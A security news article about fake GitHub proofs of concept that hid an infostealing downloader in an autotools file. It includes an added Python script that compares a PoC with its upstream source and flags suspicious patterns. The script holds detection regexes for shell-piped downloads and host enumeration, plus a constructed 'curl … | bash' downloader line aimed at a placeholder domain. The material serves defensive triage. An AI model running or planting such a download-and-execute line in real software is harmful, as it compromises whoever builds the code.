Linux Hacker Exploits Researchers with Fake PoCs Posted to GitHub

Published: 23/11/2024   Category: security




A cyber attacker gives defenders a taste of their own medicine, with GitHub honeypots concealing infostealers.



A GitHub user managed to dupe security researchers by publishing fake proofs-of-concept (PoCs) containing Linux backdoors.
Cybersecurity researchers use PoCs to test and better understand publicly known vulnerabilities. They are essential and ubiquitous, which perhaps makes it easier for a bad one to slip through.
Researchers from Uptycs this week outed a GitHub user (now deactivated) who copied legitimate PoCs for known vulnerabilities, reposting them with hidden Linux-built infostealing malware. One of the two fake PoCs had already been forked 25 times at the time of discovery; a second copy has been forked 20 times.
Siddartha Malladi, security researcher at Uptycs, doesn't blame the victims for the egg on their face. "On any bad day, I just might not check every detail," he says about this kind of trap. "I'm not efficient enough to check every line of code every day, right?"
During regular testing for various common vulnerabilities, the Uptycs researchers came across a suspicious PoC. "On the surface, it appears to be an authentic demonstration, complete with strings that mimic genuine output," they wrote in their blog post, but running the code "triggered significant irregularities in their system, including unexpected network connections, unusual data transfers, and unauthorized system access attempts."
It turned out that what they'd downloaded was a GitHub entry masquerading as a PoC for CVE-2023-35829, a 7.0-rated high-severity use-after-free vulnerability in the Linux kernel. The contents of the submission were, tellingly, copied almost bit-for-bit from a legitimate PoC for a different vulnerability in the Linux kernel, CVE-2022-34918. The only difference was an additional file — src/aclocal.m4 — acting as a downloader for a Linux bash script. The script contains a backdoor that collects information about the host machine, such as the hostname, the username, and a list of home directory contents.
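The comparison above (a copied PoC that differs from its source only by one extra file) suggests a simple triage check a researcher can run before building anything. The following Python script is an added example, not code from the article or from Uptycs: it diffs a downloaded PoC directory against the upstream repository it appears to copy, lists files that exist only in the copy or whose contents changed, and flags those files when they contain fetch-and-execute, decoding or host-enumeration patterns. The directory trees, file contents and heuristic regexes are constructed for the example; only the file name src/aclocal.m4 is taken from the article.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Heuristic patterns chosen for this example (not from the Uptycs write-up).
# They catch the obvious "download and run" shapes and a few staging tricks.
SUSPICIOUS_PATTERNS = {
    "remote-fetch-and-execute": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"),
    "base64-decode": re.compile(r"base64\s+(-d|--decode)\b"),
    "eval-of-string": re.compile(r"\beval\b"),
    "host-enumeration": re.compile(r"\b(hostname|whoami)\b"),
}


def file_tree(root: Path) -> Dict[str, str]:
    """Map relative POSIX path -> contents for every regular file under root."""
    tree: Dict[str, str] = {}
    for path in root.rglob("*"):
        if path.is_file():
            tree[path.relative_to(root).as_posix()] = path.read_text(errors="replace")
    return tree


def audit_fork(upstream: Path, fork: Path) -> Dict[str, List[str]]:
    """Compare a downloaded PoC against the repository it claims to derive from.

    Returns the files added in the fork, the files whose content differs from
    upstream, and the suspicious patterns found in those added/changed files.
    Files identical to upstream are not scanned: the point is to surface what
    the re-poster changed.
    """
    base = file_tree(upstream)
    candidate = file_tree(fork)
    added = sorted(set(candidate) - set(base))
    changed = sorted(p for p in candidate if p in base and candidate[p] != base[p])
    findings: List[str] = []
    for rel in added + changed:
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(candidate[rel]):
                findings.append(f"{rel}: {name}")
    return {"added": added, "changed": changed, "findings": findings}


def demo() -> Dict[str, List[str]]:
    """Build two constructed directory trees and audit the 'fork' against 'upstream'."""
    with tempfile.TemporaryDirectory() as tmp:
        upstream = Path(tmp) / "upstream"
        fork = Path(tmp) / "fork"
        # Constructed placeholder sources shared by both trees (not a real exploit).
        shared = {
            "exploit.c": "/* constructed placeholder */\nint main(void) { return 0; }\n",
            "Makefile": "all:\n\tcc -o exploit exploit.c\n",
        }
        for root in (upstream, fork):
            for rel, body in shared.items():
                target = root / rel
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_text(body)
        # The fork carries one extra file with an autotools-looking name; its
        # contents are a constructed stand-in for a downloader, using an
        # .invalid domain so nothing is ever fetched.
        extra = fork / "src" / "aclocal.m4"
        extra.parent.mkdir(parents=True, exist_ok=True)
        extra.write_text(
            "dnl constructed sample: downloader hidden in an autotools-looking file\n"
            "curl -fsSL https://example.invalid/setup.sh | bash\n"
        )
        return audit_fork(upstream, fork)


if __name__ == "__main__":
    for key, values in demo().items():
        print(f"{key}: {values}")
```

The heuristics only catch the obvious downloader shapes; an added file that matches nothing still deserves a manual read before the PoC is configured, built or run, and that run belongs in a throwaway VM with its network traffic recorded.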
The same profile behind that first malicious PoC also published one more, pertaining to CVE-2023-20871, a 7.8-rated high-severity privilege escalation vulnerability in the VMware Fusion hypervisor. In everything but name, this second honeypot was identical to the first.
The mastermind behind all of this is GitHub user ChriSanders22. The profile appears to have stolen its bio from another GitHub user, and its profile picture depicts the chess grandmaster Shakhriyar Mamedyarov. Malladi was able to connect the profile with a user on chess.com from the Philippines.
The profile and its malicious PoCs have since been deleted. A GitHub spokesperson informed Dark Reading, "We removed the content in accordance with GitHub's Acceptable Use Policies, which prohibit posting content that directly supports unlawful active attack or malware campaigns that are causing technical harms."
A copied version of the fake CVE-2023-35829 PoC is still live. It has been forked 20 times.
Neoteric as PoC poisoning may be, hackers have been known to impersonate researchers before. They might do it just to prove that they can, or to learn more about their adversaries. Or, Malladi posits, they might want to steal researchers' powerful software tools.
Meanwhile, there's not much that repositories can do to prevent this particular brand of phishing, even when a fake PoC obviously overlaps with a legitimate one. Malladi posits a hypothetical college course, where beginner students are assigned to code a "hello, world" program in Python, then publish it to GitHub. The same code could be published by dozens of new accounts, but what can they do? It is a legit thing. That's the problem — even if copying can be detected, the admins cannot do anything about it.
And so, cybersecurity professionals are going to have to walk the walk — engaging with cyberspace with the same caution and preparedness they expect of their clients, by always testing in a virtual environment.
"We've definitely seen these types of attacks before," Malladi emphasizes. "I want people to understand that this is not stopping in the future."
